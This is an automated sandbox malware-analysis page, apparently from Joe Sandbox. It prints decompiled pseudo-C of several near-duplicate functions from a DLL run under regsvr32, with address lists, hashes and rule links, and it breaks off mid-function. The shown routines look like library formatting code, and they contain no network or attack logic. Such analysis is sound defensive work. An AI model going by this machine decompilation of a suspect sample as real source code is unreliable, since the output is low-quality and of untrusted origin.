                                                                                                              0x18001c940
                                                                                                              0x18001c943
                                                                                                              0x18001c946
                                                                                                              0x18001c949
                                                                                                              0x18001c94c
                                                                                                              0x18001c952
                                                                                                              0x18001c954
                                                                                                              0x18001c956
                                                                                                              0x18001c95f
                                                                                                              0x18001c968
                                                                                                              0x18001c96d
                                                                                                              0x18001c976
                                                                                                              0x18001c97c
                                                                                                              0x18001c984
                                                                                                              0x18001c99e
                                                                                                              0x18001c9a3
                                                                                                              0x18001c9ab
                                                                                                              0x18001c9b2
                                                                                                              0x18001c9b8
                                                                                                              0x18001c9bf
                                                                                                              0x18001c9cc
                                                                                                              0x18001c9dc
                                                                                                              0x18001c9e3
                                                                                                              0x18001c9e9
                                                                                                              0x18001c9f3
                                                                                                              0x18001c9fd
                                                                                                              0x18001ca04
                                                                                                              0x18001ca0b
                                                                                                              0x18001ca11
                                                                                                              0x18001ca16
                                                                                                              0x18001ca1f
                                                                                                              0x18001ca28
                                                                                                              0x18001ca2e
                                                                                                              0x18001ca33
                                                                                                              0x18001ca37
                                                                                                              0x18001ca3a
                                                                                                              0x18001ca41
                                                                                                              0x18001ca45
                                                                                                              0x18001ca50
                                                                                                              0x18001ca55
                                                                                                              0x18001ca5b
                                                                                                              0x18001ca62
                                                                                                              0x18001ca6f
                                                                                                              0x18001ca7b
                                                                                                              0x18001ca7f
                                                                                                              0x18001ca81
                                                                                                              0x18001ca85
                                                                                                              0x18001ca8d
                                                                                                              0x18001ca9d
                                                                                                              0x18001caa4
                                                                                                              0x18001caac
                                                                                                              0x18001caae
                                                                                                              0x18001cab2
                                                                                                              0x18001cab6
                                                                                                              0x18001cac0
                                                                                                              0x18001cac5
                                                                                                              0x18001caca
                                                                                                              0x18001cace
                                                                                                              0x18001cadb
                                                                                                              0x18001cae6
                                                                                                              0x18001caef
                                                                                                              0x18001caf1
                                                                                                              0x18001cafa
                                                                                                              0x18001cafd
                                                                                                              0x18001cb16

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4879a43ff2062e1128ba489a04f180a0de1b885da1a00b0534ee6d6d4ba3cf0c
                                                                                                              • Instruction ID: a9951b2e2418a3885cb07d2f04b31a9a2b1555f1bf4e6862ae959de690d5cdde
                                                                                                              • Opcode Fuzzy Hash: 4879a43ff2062e1128ba489a04f180a0de1b885da1a00b0534ee6d6d4ba3cf0c
                                                                                                              • Instruction Fuzzy Hash: 1751E673614A5882E7AA8F28C0597AC37A0E759F9CF148109EF45577D8CF30CE49C786
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001EF18 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118001EF18(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t86;
				signed int _t90;
				void* _t110;
				intOrPtr _t111;
				signed int _t118;
				intOrPtr _t129;
				void* _t133;
				void* _t142;
				intOrPtr _t148;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t133 = __rcx;
				bpl = __edx;
				_t86 =  *((intOrPtr*)(__rcx + 0x34));
				_t110 = _t86 - 5;
				if (_t110 > 0) goto 0x8001efff;
				if (_t110 == 0) goto 0x8001ef68;
				_t111 = _t86;
				if (_t111 == 0) goto 0x8001f053;
				if (_t111 == 0) goto 0x8001efd7;
				if (_t111 == 0) goto 0x8001efb0;
				if (_t111 == 0) goto 0x8001f053;
				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001f01f;
				_t90 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t142;
				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001ef9a;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001ef9a;
				 *(__rcx + 0x28) = _t90 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001f07e;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001f095;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001efd1;
				goto 0x8001ef83;
				goto 0x8001ef83;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t118 == 0) goto 0x8001eff9;
				goto 0x8001ef83;
				goto 0x8001ef83;
				if (_t118 == 0) goto 0x8001ef68;
				if (_t118 == 0) goto 0x8001ef68;
				if (_t118 == 0) goto 0x8001ef68;
				goto 0x8001ef56;
				_t129 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t129 + 0x30)) = 1;
				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001f0ee;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t131 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001f076;
				_t148 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001ef83;
				goto 0x8001ef83;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E000000011800167C4(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t148,  *((intOrPtr*)(__rcx + 8)));
				if (_t148 != 0) goto 0x8001f09e;
				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
				 *((char*)(_t133 + 0x4c)) = 1;
				r8b = bpl;
				if (_t142 != 8) goto 0x8001f0b8;
				E00000001180022288(0, _t133, _t148);
				goto 0x8001f0bf;
				E00000001180020CC8( *((intOrPtr*)(_t131 - 8)), _t133);
				if (0 == 0) goto 0x8001f0ec;
				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001f0dd;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001f0ec;
				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001ef18
                                                                                                              0x18001ef1d
                                                                                                              0x18001ef22
                                                                                                              0x18001ef2c
                                                                                                              0x18001ef2f
                                                                                                              0x18001ef32
                                                                                                              0x18001ef35
                                                                                                              0x18001ef38
                                                                                                              0x18001ef3e
                                                                                                              0x18001ef40
                                                                                                              0x18001ef42
                                                                                                              0x18001ef4b
                                                                                                              0x18001ef54
                                                                                                              0x18001ef59
                                                                                                              0x18001ef62
                                                                                                              0x18001ef68
                                                                                                              0x18001ef70
                                                                                                              0x18001ef8a
                                                                                                              0x18001ef8f
                                                                                                              0x18001ef97
                                                                                                              0x18001ef9e
                                                                                                              0x18001efa4
                                                                                                              0x18001efab
                                                                                                              0x18001efb8
                                                                                                              0x18001efc8
                                                                                                              0x18001efcf
                                                                                                              0x18001efd5
                                                                                                              0x18001efdf
                                                                                                              0x18001efe9
                                                                                                              0x18001eff0
                                                                                                              0x18001eff7
                                                                                                              0x18001effd
                                                                                                              0x18001f002
                                                                                                              0x18001f00b
                                                                                                              0x18001f014
                                                                                                              0x18001f01a
                                                                                                              0x18001f01f
                                                                                                              0x18001f023
                                                                                                              0x18001f026
                                                                                                              0x18001f02d
                                                                                                              0x18001f031
                                                                                                              0x18001f03c
                                                                                                              0x18001f041
                                                                                                              0x18001f047
                                                                                                              0x18001f04e
                                                                                                              0x18001f05b
                                                                                                              0x18001f067
                                                                                                              0x18001f06b
                                                                                                              0x18001f06d
                                                                                                              0x18001f071
                                                                                                              0x18001f079
                                                                                                              0x18001f089
                                                                                                              0x18001f090
                                                                                                              0x18001f098
                                                                                                              0x18001f09a
                                                                                                              0x18001f09e
                                                                                                              0x18001f0a2
                                                                                                              0x18001f0ac
                                                                                                              0x18001f0b1
                                                                                                              0x18001f0b6
                                                                                                              0x18001f0ba
                                                                                                              0x18001f0c7
                                                                                                              0x18001f0d2
                                                                                                              0x18001f0db
                                                                                                              0x18001f0dd
                                                                                                              0x18001f0e6
                                                                                                              0x18001f0e9
                                                                                                              0x18001f102

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d49b9d71076512b6bbbe891cf3289b4b7b27fe3cc3fd9faa2e9cd746c18fb37
                                                                                                              • Instruction ID: c4762597ef1c1893b3d76005bb8b76fd1862791030d5408f62859f73e2e48fae
                                                                                                              • Opcode Fuzzy Hash: 0d49b9d71076512b6bbbe891cf3289b4b7b27fe3cc3fd9faa2e9cd746c18fb37
                                                                                                              • Instruction Fuzzy Hash: 1D51B573604A5883E7AA8F28C1543BC27A0E35DB98F14821AEF45177E9CF31DE4AC780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001D114 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001D114(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001d1fb;
				if (_t108 == 0) goto 0x8001d164;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001d24f;
				if (_t109 == 0) goto 0x8001d1d3;
				if (_t109 == 0) goto 0x8001d1ac;
				if (_t109 == 0) goto 0x8001d24f;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001d21b;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d196;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d196;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d27a;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001d291;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d1cd;
				goto 0x8001d17f;
				goto 0x8001d17f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001d1f5;
				goto 0x8001d17f;
				goto 0x8001d17f;
				if (_t116 == 0) goto 0x8001d164;
				if (_t116 == 0) goto 0x8001d164;
				if (_t116 == 0) goto 0x8001d164;
				goto 0x8001d152;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001d2e4;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t129 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001d272;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001d17f;
				goto 0x8001d17f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001d29a;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
				r8b = bpl;
				if (_t140 != 8) goto 0x8001d2b4;
				0x800218bc();
				goto 0x8001d2bb;
				E00000001180020338( *((intOrPtr*)(_t129 - 8)), _t131, _t146);
				if (0 == 0) goto 0x8001d2e2;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001d2d4;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001d2e2;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001d114
                                                                                                              0x18001d119
                                                                                                              0x18001d11e
                                                                                                              0x18001d128
                                                                                                              0x18001d12b
                                                                                                              0x18001d12e
                                                                                                              0x18001d131
                                                                                                              0x18001d134
                                                                                                              0x18001d13a
                                                                                                              0x18001d13c
                                                                                                              0x18001d13e
                                                                                                              0x18001d147
                                                                                                              0x18001d150
                                                                                                              0x18001d155
                                                                                                              0x18001d15e
                                                                                                              0x18001d164
                                                                                                              0x18001d16c
                                                                                                              0x18001d186
                                                                                                              0x18001d18b
                                                                                                              0x18001d193
                                                                                                              0x18001d19a
                                                                                                              0x18001d1a0
                                                                                                              0x18001d1a7
                                                                                                              0x18001d1b4
                                                                                                              0x18001d1c4
                                                                                                              0x18001d1cb
                                                                                                              0x18001d1d1
                                                                                                              0x18001d1db
                                                                                                              0x18001d1e5
                                                                                                              0x18001d1ec
                                                                                                              0x18001d1f3
                                                                                                              0x18001d1f9
                                                                                                              0x18001d1fe
                                                                                                              0x18001d207
                                                                                                              0x18001d210
                                                                                                              0x18001d216
                                                                                                              0x18001d21b
                                                                                                              0x18001d21f
                                                                                                              0x18001d222
                                                                                                              0x18001d229
                                                                                                              0x18001d22d
                                                                                                              0x18001d238
                                                                                                              0x18001d23d
                                                                                                              0x18001d243
                                                                                                              0x18001d24a
                                                                                                              0x18001d257
                                                                                                              0x18001d263
                                                                                                              0x18001d267
                                                                                                              0x18001d269
                                                                                                              0x18001d26d
                                                                                                              0x18001d275
                                                                                                              0x18001d285
                                                                                                              0x18001d28c
                                                                                                              0x18001d294
                                                                                                              0x18001d296
                                                                                                              0x18001d29a
                                                                                                              0x18001d29e
                                                                                                              0x18001d2a8
                                                                                                              0x18001d2ad
                                                                                                              0x18001d2b2
                                                                                                              0x18001d2b6
                                                                                                              0x18001d2c3
                                                                                                              0x18001d2c9
                                                                                                              0x18001d2d2
                                                                                                              0x18001d2d4
                                                                                                              0x18001d2dc
                                                                                                              0x18001d2df
                                                                                                              0x18001d2f8

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9b58a57408ee68a80c25351368f3b4a6fe6158c0ea8c8905d7adbf4523bc158
                                                                                                              • Instruction ID: f5c14acb34b91717c8a5d43ee0115acbf6e369d43197767cd4a72c2837087e9a
                                                                                                              • Opcode Fuzzy Hash: a9b58a57408ee68a80c25351368f3b4a6fe6158c0ea8c8905d7adbf4523bc158
                                                                                                              • Instruction Fuzzy Hash: 2751B273204E5CA2E7AA8F28C1543AD37A1E369BD8F158116EF45177A8CF30DE49C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001B310 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001B310(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001b3f7;
				if (_t108 == 0) goto 0x8001b360;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001b44b;
				if (_t109 == 0) goto 0x8001b3cf;
				if (_t109 == 0) goto 0x8001b3a8;
				if (_t109 == 0) goto 0x8001b44b;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001b417;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b392;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b392;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b476;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001b48d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b3c9;
				goto 0x8001b37b;
				goto 0x8001b37b;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001b3f1;
				goto 0x8001b37b;
				goto 0x8001b37b;
				if (_t116 == 0) goto 0x8001b360;
				if (_t116 == 0) goto 0x8001b360;
				if (_t116 == 0) goto 0x8001b360;
				goto 0x8001b34e;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001b4e0;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (0 == 0) goto 0x8001b46e;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001b37b;
				goto 0x8001b37b;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				_t51 = _t131 + 0x50; // 0x91
				E0000000118001671C(__rcx, _t51,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001b496;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
				r8b = bpl;
				if (_t140 != 8) goto 0x8001b4b0;
				E000000011800210A0(0, _t131, _t146);
				goto 0x8001b4b7;
				0x8001fb28();
				if (0 == 0) goto 0x8001b4de;
				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001b4d0;
				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001b4de;
				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
				return 1;
			}














                                                                                                              0x18001b310
                                                                                                              0x18001b315
                                                                                                              0x18001b31a
                                                                                                              0x18001b324
                                                                                                              0x18001b327
                                                                                                              0x18001b32a
                                                                                                              0x18001b32d
                                                                                                              0x18001b330
                                                                                                              0x18001b336
                                                                                                              0x18001b338
                                                                                                              0x18001b33a
                                                                                                              0x18001b343
                                                                                                              0x18001b34c
                                                                                                              0x18001b351
                                                                                                              0x18001b35a
                                                                                                              0x18001b360
                                                                                                              0x18001b368
                                                                                                              0x18001b382
                                                                                                              0x18001b387
                                                                                                              0x18001b38f
                                                                                                              0x18001b396
                                                                                                              0x18001b39c
                                                                                                              0x18001b3a3
                                                                                                              0x18001b3b0
                                                                                                              0x18001b3c0
                                                                                                              0x18001b3c7
                                                                                                              0x18001b3cd
                                                                                                              0x18001b3d7
                                                                                                              0x18001b3e1
                                                                                                              0x18001b3e8
                                                                                                              0x18001b3ef
                                                                                                              0x18001b3f5
                                                                                                              0x18001b3fa
                                                                                                              0x18001b403
                                                                                                              0x18001b40c
                                                                                                              0x18001b412
                                                                                                              0x18001b417
                                                                                                              0x18001b41b
                                                                                                              0x18001b41e
                                                                                                              0x18001b425
                                                                                                              0x18001b429
                                                                                                              0x18001b434
                                                                                                              0x18001b439
                                                                                                              0x18001b43f
                                                                                                              0x18001b446
                                                                                                              0x18001b453
                                                                                                              0x18001b463
                                                                                                              0x18001b465
                                                                                                              0x18001b469
                                                                                                              0x18001b471
                                                                                                              0x18001b481
                                                                                                              0x18001b484
                                                                                                              0x18001b488
                                                                                                              0x18001b490
                                                                                                              0x18001b492
                                                                                                              0x18001b496
                                                                                                              0x18001b49a
                                                                                                              0x18001b4a4
                                                                                                              0x18001b4a9
                                                                                                              0x18001b4ae
                                                                                                              0x18001b4b2
                                                                                                              0x18001b4bf
                                                                                                              0x18001b4c5
                                                                                                              0x18001b4ce
                                                                                                              0x18001b4d0
                                                                                                              0x18001b4d8
                                                                                                              0x18001b4db
                                                                                                              0x18001b4f4

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a715aa4b1fa01e87fb2488215a2533adc049f6bc917bb87a0801bc631f1541a7
                                                                                                              • Instruction ID: e565c284493e7621083591c624e474ae9aa7564fa02d05cf5547407507ea4e5b
                                                                                                              • Opcode Fuzzy Hash: a715aa4b1fa01e87fb2488215a2533adc049f6bc917bb87a0801bc631f1541a7
                                                                                                              • Instruction Fuzzy Hash: DD51BF73604E5883E7AA8F28C1953AC37A4E759BD8F14C119EF46977A9CF20CE59C780
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018001E320 Relevance: .1, Instructions: 137COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118001E320(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				signed long long _v24;
				intOrPtr _t84;
				signed int _t88;
				void* _t108;
				intOrPtr _t109;
				signed int _t116;
				intOrPtr _t127;
				void* _t131;
				void* _t140;
				intOrPtr _t146;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t131 = __rcx;
				bpl = __edx;
				_t84 =  *((intOrPtr*)(__rcx + 0x34));
				_t108 = _t84 - 5;
				if (_t108 > 0) goto 0x8001e407;
				if (_t108 == 0) goto 0x8001e370;
				_t109 = _t84;
				if (_t109 == 0) goto 0x8001e45b;
				if (_t109 == 0) goto 0x8001e3df;
				if (_t109 == 0) goto 0x8001e3b8;
				if (_t109 == 0) goto 0x8001e45b;
				if (_t84 - 0xffffffffffffffff != 1) goto 0x8001e427;
				_t88 =  *(__rcx + 0x28);
				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t140;
				if ((_t88 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e3a2;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e3a2;
				 *(__rcx + 0x28) = _t88 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e486;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0x8001e49d;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e3d9;
				goto 0x8001e38b;
				goto 0x8001e38b;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t116 = dil &  *(__rcx + 0x28) >> 0x00000004;
				if (_t116 == 0) goto 0x8001e401;
				goto 0x8001e38b;
				goto 0x8001e38b;
				if (_t116 == 0) goto 0x8001e370;
				if (_t116 == 0) goto 0x8001e370;
				if (_t116 == 0) goto 0x8001e370;
				goto 0x8001e35e;
				_t127 =  *((intOrPtr*)(__rcx + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t127 + 0x30)) = 1;
				 *((intOrPtr*)(_t127 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(__rcx + 8));
				_v24 = _v24 & 0x00000000;
				0x80013858();
				goto 0x8001e4f0;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
				_t129 =  *((intOrPtr*)(__rcx + 0x18));
				if (0 == 0) goto 0x8001e47e;
				_t146 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8));
				goto 0x8001e38b;
				goto 0x8001e38b;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) & 0xfffffff7;
				E0000000118001671C(__rcx, __rcx + 0x50,  *((intOrPtr*)(__rcx + 0x30)), _t146,  *((intOrPtr*)(__rcx + 8)));
				if (_t146 != 0) goto 0x8001e4a6;
				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
				 *((char*)(_t131 + 0x4c)) = 0;
